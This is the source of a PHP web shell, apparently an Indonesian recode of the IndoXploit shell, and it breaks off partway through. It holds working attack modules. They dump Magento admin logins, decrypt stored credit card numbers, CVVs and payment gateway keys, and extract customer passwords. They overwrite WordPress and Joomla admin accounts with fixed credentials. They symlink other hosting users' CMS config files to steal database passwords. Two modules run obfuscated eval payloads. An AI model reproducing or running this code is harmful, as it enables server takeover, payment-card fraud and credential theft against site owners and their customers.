s

Deskripsi

 Login








 /!\ Error Violence /!\
@import url(https://fonts.googleapis.com/css?family=Abel);
html {
background: #000000;
color: red;
font-family: 'Abel';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Abel';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid white;
}
th {
padding: 10px;
}
a {
color: white;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: red;
border: 1px solid white;
margin: 5px auto;
padding-left: 5px;
font-family: 'Abel';
font-size: 13px;
}
textarea {
border: 1px solid red;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: white;
font-family: 'Abel';
font-size: 13px;
}
select {
background: transparent;
color: red;
border: 1px solid red;
margin: 5px auto;
padding-left: 5px;
font-family: 'Abel';
font-size: 13px;
}
.but {
background: transparent;
color: white;
border: 1px solid red;
margin: 5px auto;
padding-left: 5px;
font-family: 'Abel';
font-size: 13px;
}
\n";} if (!mysql_connect($connection->host, $connection->username, $connection->password)){ print("Could not connect: " . mysql_error()); } mysql_select_db($connection->dbname); echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key\n"; $crypto = new Varien_Crypt_Mcrypt(); $crypto->init($key); //========================================================================================================= $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'"); if (!$query){ echo "

Gagal

"; }else{ $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'")); echo' ==================================================================== [ Admin FROM website : '.$site['website'].']  ===================================================================='; } echo "

"; while($vx = mysql_fetch_array($query)) { $no = 1; $user_id = $vx['user_id']; $username = $vx['username']; $password = $vx['password']; $email = $vx['email']; $firstname = $vx['firstname']; $lastname = $vx['lastname']; echo "$user_id$firstname$lastname$email$username$password"; } echo "













id firstname lastname email username password

"; //========================================================================================================= $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'"); if(mysql_num_rows($query) != 0){ if (!$query){ echo "

Gagal

"; }else{ echo' ==================================================================== [ Authorizenet ]  ===================================================================='; } echo "

"; $no = 1; while($vx = mysql_fetch_array($query)) { $user = $crypto->decrypt($vx['user']); $pass = $crypto->decrypt($vx['pass']); echo "$no$user$pass"; $no++; } echo "










no user pass

"; } //========================================================================================================= $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1"); if(mysql_num_rows($query_smtp) != 0){ if (!$query_smtp){ echo "

Gagal

"; }else{ echo' ==================================================================== [ SMTP ]  ===================================================================='; } echo "

"; $no = 1; $batas = 0; while($rows = mysql_fetch_array($query_smtp)) { $smtphost = $rows[0]; $smtpport = $rows[1]; $smtpuser = $rows[2]; $smtppass = $rows[3]; echo "$no$smtphost$smtpport$smtpuser$smtppass"; $no++; } echo "












no host port user pass

"; } //========================================================================================================= $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'"); $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''"); if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){ echo' ==================================================================== [ Credit Card ]  ===================================================================='; echo "

"; $no = 1; $batas = 0; while($vx = mysql_fetch_array($query)){ $date = $vx['updated_at']; $cc_owner = $vx['cc_owner']; $method = $vx['method']; $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']); $exp = $vx['exp']; $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']); $Billing_Address = $vx['Billing Address']; echo "$no$date$cc_owner$method$cc_number_enc$exp$cc_cid_enc$Billing_Address"; $batas = $no++; } while($vx2 = mysql_fetch_array($query2)){ $batas +=1; $cc_owner = $vx2['cc_owner']; $method = $vx2['method']; $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']); $exp = $vx2['exp']; $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']); $Billing_Address = $vx2['Billing Address']; echo "$batas$cc_owner$method$cc_number_enc$exp$cc_cid_status$Billing_Address"; $batas++; } echo "















no Date Credit Owner method Credit Number Credit Exp CVV Address

"; } //========================================================================================================= $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12"); $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote"); if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){ if (!$query){ echo "

Gagal

"; }else{ echo' ==================================================================== [ Customer ]  ===================================================================='; } echo "

"; $no = 1; $batas = 0; while($vx = mysql_fetch_array($query)) { $user = $vx['email']; $pass = $vx['value']; echo "$no$user$pass"; $batas = $no++; } if(mysql_num_rows($query2) != 0 && ($query2)){ while($vx2 = mysql_fetch_array($query2)){ $user = $vx2['customer_email']; $pass = $crypto->decrypt($vx2['password_hash']); if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin $batas +=1; echo "$batas$user$pass"; $batas++; } } } echo "










no user pass

"; } //========================================================================================================= } } function save($format,$data){ $fp = fopen($format, 'a'); fwrite($fp, $data); fclose($fp); } function cekbase64($string){ $decoded = base64_decode($string, true); if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false; if(!base64_decode($string, true)) return false; if(base64_encode($decoded) != $string) return false; return true;//nilai return 1 jika true } //----untuk decode password ---/ class Varien_Crypt_Mcrypt{ /** * Constuctor * * @param array $data */ public function __construct() { } /** * Initialize mcrypt module * * @param string $key cipher private key * @return Varien_Crypt_Mcrypt */ public function init($key) { $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND); $maxKeySize = mcrypt_enc_get_key_size($this->handler); if (iconv_strlen($key, 'UTF-8')>$maxKeySize) { //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize); return null; } mcrypt_generic_init($this->handler, $key, $iv); return $this; } /** * Encrypt data * * @param string $data source string * @return string */ public function encrypt($data) { if (!$this->handler) { //throw new Varien_Exception('Crypt module is not initialized.'); return null; } if (strlen($data) == 0) { return $data; } return base64_encode(mcrypt_generic($this->handler, $data)); } /** * Decrypt data * * @param string $data encrypted string * @return string */ public function decrypt($data) { if (!$this->handler) { //throw new Varien_Exception('Crypt module is not initialized.'); return null; } if (strlen($data) == 0) { return $data; } return mdecrypt_generic($this->handler, base64_decode($data)); } /** * Desctruct cipher module * */ public function __destruct() { if ($this->handler) { $this->_reset(); } } protected function _reset() { mcrypt_generic_deinit($this->handler); mcrypt_module_close($this->handler); } } } elseif($_GET['do'] == 'zip') { echo "


Zip Menu


"; function rmdir_recursive($dir) { foreach(scandir($dir) as $file) { if ('.' === $file || '..' === $file) continue; if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach($accepted_types as $mime_type) { if($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if(!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__).'/'; $filenoext = basename ($filename, '.zip'); $filenoext = basename ($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive ( $targetdir); mkdir($targetdir, 0777); if(move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "Sukses Gan :)"; } else { $message = "Error Gan :("; } } echo '









Upload And Unzip


'; if($message) echo "

$message


"; echo "

Zip Backup


Folder:

Save To:

"; if($_POST['backup']){ $save=$_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'],$save); echo "Done , Save To $save"; } echo "

Unzip Manual


Zip Location:

Save To:

"; if($_POST['extrak']){ $save=$_POST['save']; $zip = new ZipArchive; $res = $zip->open($_POST['dir']); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo 'Succes , Location : '.$save.''; } else { echo 'Gagal Mas :( Ntahlah !'; } } echo '

'; } elseif($_GET['do'] == 'shellchk') { eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU=')))))); } elseif($_GET['do'] == 'loghunter') {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));} elseif($_GET['do'] == 'metu') { echo '
'; unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'Doaku menyertaimu ;*'; } elseif($_GET['do'] == 'about') { echo '
Garuda Pancasila Shell
IndoXploit Shell Recoded By StuxtN3t
For More Script Visit Here'; } elseif($_GET['do'] == 'auto_cu_wp') { if($_POST['gass']) { echo "

WordPress Auto Change User 2


Link Config:

"; } else { echo "

WordPress Auto Change User 2


Link Config:

"; } if($_POST['auto_cu_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $user = "StuxtN3t"; $pass = "StuxtN3t"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[ $target ]
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; mysql_close($conn); } } } } elseif($_GET['do'] == 'auto_cu_joomla') { if($_POST['gass']) { echo "

Joomla Auto Change User 2


Link Config:

"; } else { echo "

Joomla Auto Change User 2


Link Config:

"; } if($_POST['auto_cu_joomla']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $user = "StuxtN3t"; $pass = "StuxtN3t"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'"); echo "Config => ".$dir_config."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => Done , Username : $user Password : $pass

"; } mysql_close($conn); } } } elseif($_GET['do'] == 'symconfig') { if(strtolower(substr(PHP_OS, 0, 3)) == "win"){ echo ''; exit; } else { if($_POST["m"] && !$_POST["passwd"]==""){ @mkdir("GB_symconf", 0777); @chdir("GB_symconf"); @symlink("/","root"); $htaccess="Options Indexes FollowSymLinks DirectoryIndex jancox.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any"; @file_put_contents(".htaccess",$htaccess); $etc_passwd=$_POST["passwd"]; $etc_passwd=explode("\n",$etc_passwd); foreach($etc_passwd as $passwd){ $pawd=explode(":",$passwd); $user =$pawd[0]; @symlink('/','GB_symconf/root'); @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt'); @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt'); @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt'); @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt'); 